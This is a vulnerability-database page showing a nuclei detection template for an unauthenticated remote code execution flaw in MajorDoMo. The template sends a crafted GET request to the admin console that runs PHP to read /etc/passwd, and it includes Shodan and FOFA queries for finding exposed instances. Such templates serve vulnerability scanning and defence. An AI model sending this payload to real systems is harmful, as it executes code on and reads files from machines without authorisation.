Lucene search
K

MajorDoMo - Unauthenticated RCE

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 7 Views

MajorDoMo unauthenticated remote code execution due to include order bug and missing exit redirect.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-27174
18 Feb 202621:10
attackerkb
Circl
CVE-2026-27174
18 Feb 202622:19
circl
CNNVD
MajorDoMo 代码注入漏洞
18 Feb 202600:00
cnnvd
CVE
CVE-2026-27174
18 Feb 202621:10
cve
Cvelist
CVE-2026-27174 MajorDoMo Unauthenticated Remote Code Execution via Admin Console Eval
18 Feb 202621:10
cvelist
Metasploit
MajorDoMo Console Eval Unauthenticated RCE
2 Mar 202618:58
metasploit
NVD
CVE-2026-27174
18 Feb 202622:16
nvd
Packet Storm
📄 MajorDoMo Console Eval Unauthenticated Remote Code Execution
2 Mar 202600:00
packetstorm
Packet Storm
📄 MajorDoMo Remote Code Execution
6 Mar 202600:00
packetstorm
Positive Technologies
PT-2026-20510
18 Feb 202600:00
ptsecurity
Rows per page
id: CVE-2026-27174

info:
  name: MajorDoMo - Unauthenticated RCE
  author: 0x_Akoko
  severity: critical
  description: |
   MajorDoMo contains a remote code execution caused by an include order bug and lack of exit after redirect in admin panel's PHP console, letting unauthenticated attackers execute arbitrary PHP code via crafted GET requests.
  impact: |
   Unauthenticated attackers can execute arbitrary PHP code remotely, potentially leading to full system compromise.
  remediation: |
   Update to the latest version with the fix for the include order bug and proper exit after redirect.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-27174
    - https://github.com/sergejey/majordomo/issues/1177
    - https://chocapikk.com/posts/2026/majordomo-revisited
    - https://www.vulncheck.com/advisories/majordomo-unauthenticated-remote-code-execution-via-admin-console-eval
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    cvss-score: 10.0
    cve-id: CVE-2026-27174
    epss-score: 0.06996
    epss-percentile: 0.93382
    cwe-id: CWE-94
    cpe: cpe:2.3:a:sergejey:majordomo:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sergejey
    product: majordomo
    fofa-query: body="templates/application.html"
    shodan-query: http.html:"templates/application.html"
  tags: cve,cve2026,rce,majordomo,php,unauth,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_all(body, 'MajordomoSL', 'templates/application.html', 'majordomo')"
        condition: and
        internal: true

  - raw:
      - |
        GET /admin.php?ajax_panel=1&op=console&command=echo+file_get_contents%28%27%2Fetc%2Fpasswd%27%29%3B HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210098b1eab3c3d5a97f216ef315bd6a7610917a678ab891f04f890480fcd804452902200c9e081b99d5c7658a77644c091c59394bca14e1d9323ce72ad6cd5ecae86287:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Apr 2026 02:11Current
6.9Medium risk
Vulners AI Score6.9
CVSS 49.3
CVSS 3.19.8
EPSS0.06996
SSVC
7